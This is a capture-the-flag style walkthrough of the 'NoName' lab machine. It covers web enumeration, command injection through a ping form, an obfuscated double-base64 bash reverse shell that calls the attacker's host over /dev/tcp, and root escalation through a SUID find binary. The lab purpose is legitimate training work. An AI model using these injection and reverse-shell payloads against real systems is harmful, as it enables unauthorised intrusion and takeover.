> For the complete documentation index, see [llms.txt](https://viperone.gitbook.io/pentest-everything/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/noname.md).

# NoName

## Nmap

```
sudo nmap 192.168.64.15 -p- -sS -sV                               

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
```

Checking out the target address shows we land on a page headed 'Fake Admin Area'. This page has a query box. I was unable to get any output from this or perform any command injection.

![/index.php](/files/-MY1RdJxYEBFFzdJpXI1)

Further enumeration shows the /admin page being valid. This presents that page below.

![/admin](/files/-MY1RyR20gHlTn7XAkkq)

Nothing interesting here but we do have something in the page source.

![/admin](/files/-MY1S94PyRsVh2RT-MmI)

So far nowhere for this to be used but we can take a note of this. I decided from here to run some more specific enumeration against the target. Running `dirsearch.py` to append .txt and .php to end of a wordlist I was able to identify the /superadmin.php webpage.

```
python3 dirsearch.py -u http://192.168.64.15/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -t 75 --full-url --suffix=.txt,.php 
```

![](/files/-MY1STy3gkkbbPPa4d48)

So far this looks the same as the other page almost but we can actually test to see if the ping function works.

![/superadmin.php](/files/-MY1Sop3yRBUL5OmNcDs)

Running `tcpdump` on our attacking machine to listen in on the interface tun0 for ICMP packets we can ping our attacking machine and can confirm if we take receipt of ICMP packets.

Start `tcpdump`:

```
sudo tcpdump -i tun0 icmp
```

Then after pinging our attacking machine from the web interface we see results which show ping is working.

![](/files/-MY1TSVKJf-KIPeNdvQP)

Ideally we need to perform some form of command injection. Testing with the interface shows we need a IP at the begging of the command regardless. The linked GitHub has a large amount of command injection techniques to try: <https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection>

After some testing I found the following to work:

```
<IP> | <Command>
```

Switching over to `Burpsuite` we can see the value `192.168.49.79 | id` was sent as a query and returned valid results in the response.

![](/files/-MY1lRecKUK12emKoBIl)

From here I ran the following command in a terminal to generate double base64 encoded output.

```
echo "echo $(echo 'bash -i >& /dev/tcp/192.168.49.79/80 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'

#Output

echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE9USXVNVFk0TGpRNUxqYzVMemd3SURBK0pqRUsK|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
```

Then encoded the output combined with the ping part of the command with Burpsuite encoder.

![](/files/-MY1os_u-f75_WlEFEWe)

Then submitted the URL encoded value as a parameter in `Burpsuite`.

![](/files/-MY1p6OK5Tivik3v_5iv)

Resulting in a reverse shell on our `netcat` listener.

![](/files/-MY1r9ejJEhnLtBG1AKl)

From here I then transferred over `linpeas` which after running found the binary 'find' has the SUID bit set.

![](/files/-MY1r4jO-eLX0NS9e5zt)

Searching [GTFOBins](https://gtfobins.github.io/gtfobins/find/) we find this can be used to spawn a root shell.

![](/files/-MY1rPA659q1cbGG7NZv)

I then run the following command to gain a root shell.

```
/usr/bin/find . -exec /bin/sh -p \; -quit
```

![](/files/-MY1rfZ7CGLwF6mTSMd3)
